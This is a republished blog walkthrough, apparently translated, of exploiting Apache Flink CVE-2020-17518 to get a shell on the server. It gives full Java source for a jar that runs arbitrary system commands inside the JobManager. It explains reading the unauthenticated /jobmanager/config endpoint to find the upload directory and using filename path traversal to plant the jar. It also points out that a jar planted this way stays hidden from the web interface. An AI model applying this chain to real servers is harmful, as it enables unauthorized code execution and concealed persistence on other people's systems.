2025-03-26 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article walks through CVE-2020-17518 in Apache Flink, from the arbitrary file write the vulnerability gives you to a one-click Getshell. The content is fairly detailed; readers who are interested can refer to it and will hopefully find it useful.
Apache Flink vulnerability CVE-2020-17518 was recently disclosed. It affects Flink versions 1.5.1 through 1.11.2, so the vulnerable code had been shipping for more than two years. The write-ups I found online stop at the file write itself: their EXP writes a file onto the server and then verifies it is there. For the exploit to be useful in an actual engagement, I wanted to turn it into an EXP that can Getshell.
0x001 Analysis and exploitation process
1.1 Environment setup
Either Vulfocus or Vulhub can stand up a CVE-2020-17518 vulnerable environment with one click.
1.2 A failed attempt
Since the vulnerability lets you write a file into any directory by putting a traversal in the upload path, the first idea was to drop a jsp into the web directory. That does not work: Flink's web front end does not parse jsp, so a jsp placed under the web directory is simply served as a static file and the browser downloads it.
1.3 A different approach: getshell through jar deployment
The idea is to reuse the jar-deployment getshell that was previously disclosed for Flink 1.9.x: an uploaded jar is run by the JobManager, so a jar whose main class executes system commands gives code execution on the server.
1.3.1 prepare the jar package
The main source is shown below; it runs the first program argument as a system command (the flattened listing from the original page is reformatted here, and the command output is read into the `o` variable the original declares).

```java
import java.io.File;
import java.util.Scanner;

// Entry class of the jar. When Flink "runs" the jar, this main() is
// invoked inside the JobManager JVM, so the command executes on the server.
public class Execute {
    public Execute() {}

    public static void main(String[] args) throws Exception {
        String o = "";
        String cmd = args[0];
        ProcessBuilder p;
        if (System.getProperty("os.name").toLowerCase().contains("win")) {
            p = new ProcessBuilder(new String[]{"cmd.exe", "/c", cmd});
        } else {
            // Prefer bash if it exists, otherwise fall back to sh.
            String pty = "/bin/sh";
            if (new File("/bin/bash").exists()) {
                pty = "/bin/bash";
            }
            p = new ProcessBuilder(new String[]{pty, "-c", cmd});
        }
        Process s = p.start();
        // Read the command's entire stdout in one token.
        Scanner c = new Scanner(s.getInputStream()).useDelimiter("\\A");
        if (c.hasNext()) {
            o = c.next();
        }
        c.close();
        System.out.println(o);
    }
}
```
The source is compiled and packaged into a jar, and the jar is then Base64-encoded so it can be embedded in the EXP.
1.3.2 Get the Flink runtime directory
Flink's web runtime files live under web.tmpdir, which by default is a directory under /tmp with a path of the form
/tmp/flink-web-xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/
The UUID in the name is generated when Flink starts, so it differs on every server, and the path has to be obtained first.
The value of web.tmpdir can be read from the REST endpoint /jobmanager/config, which returns the cluster configuration as a JSON array of key/value entries. Flink's REST API carries no authentication by default, so this request needs no credentials.
1.3.3 Upload the jar
CVE-2020-17518 is a path traversal in the filename of the multipart upload handled by the REST API. By splicing the path obtained above into that filename, the jar can be written into the directory /tmp/flink-web-f4aee131-987b-46d7-91af-754464a230b2/flink-web-upload/, which is the default web.upload.dir, the directory Flink resolves jar names against when a jar is run.
1.3.4 Execute the command and get a reverse shell
1.4 Comparison of jar upload methods
Compared with uploading the jar through "Submit New Job" in the web UI, a jar written by exploiting CVE-2020-17518 does not show up in the front end, which gives it a degree of stealth. The reason is that a normal upload is stored as <uuid>_<name>.jar and the jar list only displays files following that naming pattern, whereas the traversal writes the file under exactly the name you chose; it can still be run by that name.
0x002 One-click Getshell with Goby
Goby's super internal beta, version 1.8.236, supports exploitation of this vulnerability.
That concludes the walkthrough from CVE-2020-17518 to one-click Getshell. I hope it is of some help; if you found the article useful, share it so more people can see it.